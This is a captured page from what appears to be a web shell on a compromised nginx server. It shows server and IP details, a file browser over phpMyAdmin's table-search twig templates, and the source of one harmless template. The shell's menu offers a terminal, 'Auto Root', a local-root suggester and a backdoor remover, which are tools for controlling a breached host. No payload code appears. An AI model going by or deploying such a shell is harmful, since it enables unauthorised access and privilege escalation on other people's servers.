Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.145.88.233
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
myadmin /
templates /
table /
search /
Delete
Unzip
Name
Size
Permission
Date
Action
column_comparison_operators.twig
161
B
-rw-r--r--
2021-02-05 18:28
fields_table.twig
1.09
KB
-rw-r--r--
2021-02-05 18:28
form_tag.twig
268
B
-rw-r--r--
2021-02-05 18:28
geom_func.twig
707
B
-rw-r--r--
2021-02-05 18:28
input_box.twig
4.07
KB
-rw-r--r--
2021-02-05 18:28
replace_preview.twig
1.43
KB
-rw-r--r--
2021-02-05 18:28
rows_normal.twig
1.49
KB
-rw-r--r--
2021-02-05 18:28
rows_zoom.twig
2.7
KB
-rw-r--r--
2021-02-05 18:28
selection_form.twig
8.65
KB
-rw-r--r--
2021-02-05 18:28
zoom_result_form.twig
3.71
KB
-rw-r--r--
2021-02-05 18:28
Save
Rename
{% for column_index in 0..column_names|length - 1 %} <tr class="noclick"> {# If 'Function' column is present trying to change comment #} {% if geom_column_flag %} {% include 'table/search/geom_func.twig' with { 'column_index': column_index, 'column_types': column_types } only %} {% endif %} {# Displays column's name, type, collation and value #} <th> {{ column_names[column_index] }} </th> {% set properties = self.getColumnProperties(column_index, column_index) %} <td dir="ltr"> {{ properties['type'] }} </td> <td> {{ properties['collation'] }} </td> <td> {{ properties['func']|raw }} </td> {# here, the data-type attribute is needed for a date/time picker #} <td data-type="{{ properties['type'] }}"> {{ properties['value']|raw }} {# Displays hidden fields #} <input type="hidden" name="criteriaColumnNames[{{ column_index }}]" value="{{ column_names[column_index] }}"> <input type="hidden" name="criteriaColumnTypes[{{ column_index }}]" value="{{ column_types[column_index] }}"> <input type="hidden" name="criteriaColumnCollations[{{ column_index }}]" value="{{ column_collations[column_index] }}"> </td> </tr> {% endfor %}